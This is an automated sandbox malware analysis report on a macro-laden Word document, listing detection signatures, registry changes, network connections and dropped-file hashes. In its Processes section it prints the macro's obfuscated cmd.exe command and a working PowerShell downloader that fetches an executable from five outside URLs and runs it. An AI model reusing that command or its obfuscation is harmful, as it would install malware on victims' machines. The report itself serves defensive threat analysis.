Malware Analysis Report

2024-10-16 06:27

Sample ID 240529-byme7ada3z
Target 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118
SHA256 3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919
Tags
macro macro_on_action
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919

Threat Level: Known bad

The file 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Suspicious Office macro

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 01:33

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 01:33

Reported

2024-05-29 01:35

Platform

win10v2004-20240508-en

Max time kernel

137s

Max time network

135s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""

C:\Windows\SYSTEM32\cmd.exe

cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ ^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 www.fairfundskenya.com udp
US 8.8.8.8:53 www.trainifique.ro udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 185.199.109.153:80 www.trainifique.ro tcp
US 8.8.8.8:53 trainifique.ro udp
US 185.199.111.153:443 trainifique.ro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.photostand.de udp
DE 81.169.145.165:80 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
US 8.8.8.8:53 abdullahsheikh.info udp
US 8.8.8.8:53 lamsanviet.com udp
IN 193.203.163.237:80 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp
US 8.8.8.8:53 153.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 153.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 165.145.169.81.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.163.203.193.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
NL 23.62.61.162:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 2.17.251.23:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 162.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 23.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3492-2-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-3-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-4-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-1-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-0-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-5-0x00007FFC162CD000-0x00007FFC162CE000-memory.dmp

memory/3492-6-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-7-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-8-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-9-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-11-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-12-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp

memory/3492-10-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-13-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-14-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-15-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-16-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp

memory/3492-17-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-36-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-37-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-38-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/1216-42-0x000002BE4DE10000-0x000002BE4DE32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udcmrd5m.2di.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\134.exe

MD5 536033862cf0a0ae7b85c1edd0d9c4a7
SHA1 19ca4a149ee98f366541db126cefcd15738cd1eb
SHA256 9c545472b33561bd18c5dfedbb5c9944a1bd90cb8f4edbdee2a5d75e773b9f36
SHA512 d53d92c563d4f8aba1578f1e52abdda70aec2506bf18439e653e360c285fc01eacc8fadb85b615b38635d9c8f569bb04960084e75e0f2df749059fe43ea32b44

C:\Users\Admin\AppData\Local\Temp\TCD81A1.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

memory/3492-536-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-546-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-547-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-548-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

memory/3492-568-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-569-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-571-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-570-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp

memory/3492-572-0x00007FFC16230000-0x00007FFC16425000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 01:33

Reported

2024-05-29 01:35

Platform

win7-20240221-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
